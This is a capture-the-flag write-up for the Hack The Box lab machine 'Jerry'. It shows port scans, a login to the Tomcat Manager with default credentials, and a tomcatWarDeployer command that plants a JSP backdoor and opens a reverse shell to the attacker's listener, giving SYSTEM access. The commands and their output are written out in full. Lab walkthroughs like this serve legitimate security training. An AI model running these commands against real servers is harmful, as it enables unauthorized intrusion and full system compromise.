Jerry
Contents
Ports scan
root@kali:~/HTB/Machines/Jerry# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.95 --rate=1000 Starting masscan 1.0.5 at 2019-12-03 18:08:03 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 8080/tcp on 10.10.10.95
Nmap
root@kali:~/HTB/Machines/Jerry# nmap -sC -sV 10.10.10.95 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 13:09 EST Nmap scan report for jerry.htb (10.10.10.95) Host is up (0.043s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-favicon: Apache Tomcat |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 13.85 seconds
Web browsing
It seems to be a tomcat installation.
If we do not provide password, Tomcat bounces a 403 error, but explains how to setup users and password, providing the default password.
The default password works. We access the Manager.
tomcatWarDepoyer
We can build our own war file to create a reverse shell, but Mariusz B. has already done it for us.
Install utility
root@kali:~/HTB/Utils# git clone https://github.com/mgeeky/tomcatWarDeployer.git Cloning into 'tomcatWarDeployer'... remote: Enumerating objects: 269, done. remote: Total 269 (delta 0), reused 0 (delta 0), pack-reused 269 Receiving objects: 100% (269/269), 193.51 KiB | 1.50 MiB/s, done. Resolving deltas: 100% (148/148), done.
Create the reverse shell
root@kali:~/HTB/Machines/Jerry# python ../../Utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.95:8080 -U tomcat -P s3cret -H 10.10.14.34 -p 4444 -v -u /manager/html
tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.34:4444. DEBUG: Trying Creds: ["tomcat:s3cret"]: Browsing to "http://10.10.10.95:8080/manager/html"... DEBUG: Trying to fetch: "http://10.10.10.95:8080/manager/html/" DEBUG: Probably found something: Apache Tomcat/7.0.88 INFO: Apache Tomcat/7.0.88 Manager Application reached & validated. INFO: At: "http://10.10.10.95:8080/manager/html/" DEBUG: Generating JSP WAR backdoor code... DEBUG: Preparing additional code for Reverse TCP shell DEBUG: Generating temporary structure for jsp_app WAR at: "/tmp/tmp_sTDOH" DEBUG: Working with Java at version: 11.0.5 DEBUG: Generating web.xml with servlet-name: "JSP Application" DEBUG: Generating WAR file at: "/tmp/jsp_app.war" DEBUG: added manifest adding: files/(in = 0) (out= 0)(stored 0%) adding: files/WEB-INF/(in = 0) (out= 0)(stored 0%) adding: files/WEB-INF/web.xml(in = 505) (out= 254)(deflated 49%) adding: files/META-INF/(in = 0) (out= 0)(stored 0%) adding: files/META-INF/MANIFEST.MF(in = 66) (out= 65)(deflated 1%) adding: index.jsp(in = 4494) (out= 1681)(deflated 62%) DEBUG: Tree command not available. Skipping. DEBUG: WAR file structure: DEBUG: DEBUG: Checking if app jsp_app is deployed at: http://10.10.10.95:8080/manager/html/ DEBUG: App not deployed. INFO: It looks that the application with specified name "jsp_app" has not been deployed yet. DEBUG: Deploying application: jsp_app from file: "/tmp/jsp_app.war" DEBUG: Removing temporary WAR directory: "/tmp/tmp_sTDOH" INFO: WAR DEPLOYED! Invoking it... DEBUG: Spawned shell handling thread. Awaiting for the event... DEBUG: Awaiting for reverse-shell handler to set-up DEBUG: Establishing listener for incoming reverse TCP shell at 10.10.14.34:4444 DEBUG: Socket is binded to local port now, awaiting for clients... DEBUG: Invoking application at url: "http://10.10.10.95:8080/jsp_app/" DEBUG: Adding 'X-Pass: ijla5qmceoeM' header for shell functionality authentication. DEBUG: Incoming client: 10.10.10.95:49193 DEBUG: Application invoked correctly. INFO: ------------------------------------------------------------ INFO: JSP Backdoor up & running on http://10.10.10.95:8080/jsp_app/ INFO: Happy pwning. Here take that password for web shell: 'ijla5qmceoeM' INFO: ------------------------------------------------------------
INFO: Connected with: nt authority\system@JERRY
C:\apache-tomcat-7.0.88> whoami nt authority\system
User and root flag
C:\apache-tomcat-7.0.88> cd c:\Users\Administrator\Desktop\
c:\Users\Administrator\Desktop>
C:\apache-tomcat-7.0.88> dir Volume in drive C has no label. Volume Serial Number is FC2B-E489
Directory of c:\Users\Administrator\Desktop
06/19/2018 06:09 AM <DIR> . 06/19/2018 06:09 AM <DIR> .. 06/19/2018 06:09 AM <DIR> flags 0 File(s) 0 bytes 3 Dir(s) 27,600,785,408 bytes free
c:\Users\Administrator\Desktop>
C:\apache-tomcat-7.0.88> cd flags
c:\Users\Administrator\Desktop\flags>
C:\apache-tomcat-7.0.88> dir Volume in drive C has no label. Volume Serial Number is FC2B-E489
Directory of c:\Users\Administrator\Desktop\flags
06/19/2018 06:09 AM <DIR> . 06/19/2018 06:09 AM <DIR> .. 06/19/2018 06:11 AM 88 2 for the price of 1.txt 1 File(s) 88 bytes 2 Dir(s) 27,600,785,408 bytes free
C:\apache-tomcat-7.0.88> type "2 for the price of 1.txt" user.txt <USER_FALG>
root.txt <ROOT_FLAG> c:\Users\Administrator\Desktop\flags>
C:\apache-tomcat-7.0.88> exit
Remove the war
root@kali:~/HTB/Machines/Jerry# python ../../Utils/tomcatWarDeployer/tomcatWarDeployer.py 10.10.10.95:8080 -U tomcat -P s3cret -H 10.10.14.34 -p 4444 -R -v -u /manager/html
tomcatWarDeployer (v. 0.5.2) Apache Tomcat auto WAR deployment & launching tool Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.34:4444. WARNING: Removing previously deployed package, any further actions will not be undertaken. DEBUG: Trying Creds: ["tomcat:s3cret"]: Browsing to "http://10.10.10.95:8080/manager/html"... DEBUG: Trying to fetch: "http://10.10.10.95:8080/manager/html/" DEBUG: Probably found something: Apache Tomcat/7.0.88 INFO: Apache Tomcat/7.0.88 Manager Application reached & validated. INFO: At: "http://10.10.10.95:8080/manager/html/" DEBUG: Checking if app jsp_app is deployed at: http://10.10.10.95:8080/manager/html/ INFO: Removing previously deployed WAR application with name: 'jsp_app' INFO: Succeeded. Hasta la vista!
References
Daniel Simao 18:22, 3 December 2019 (EST)
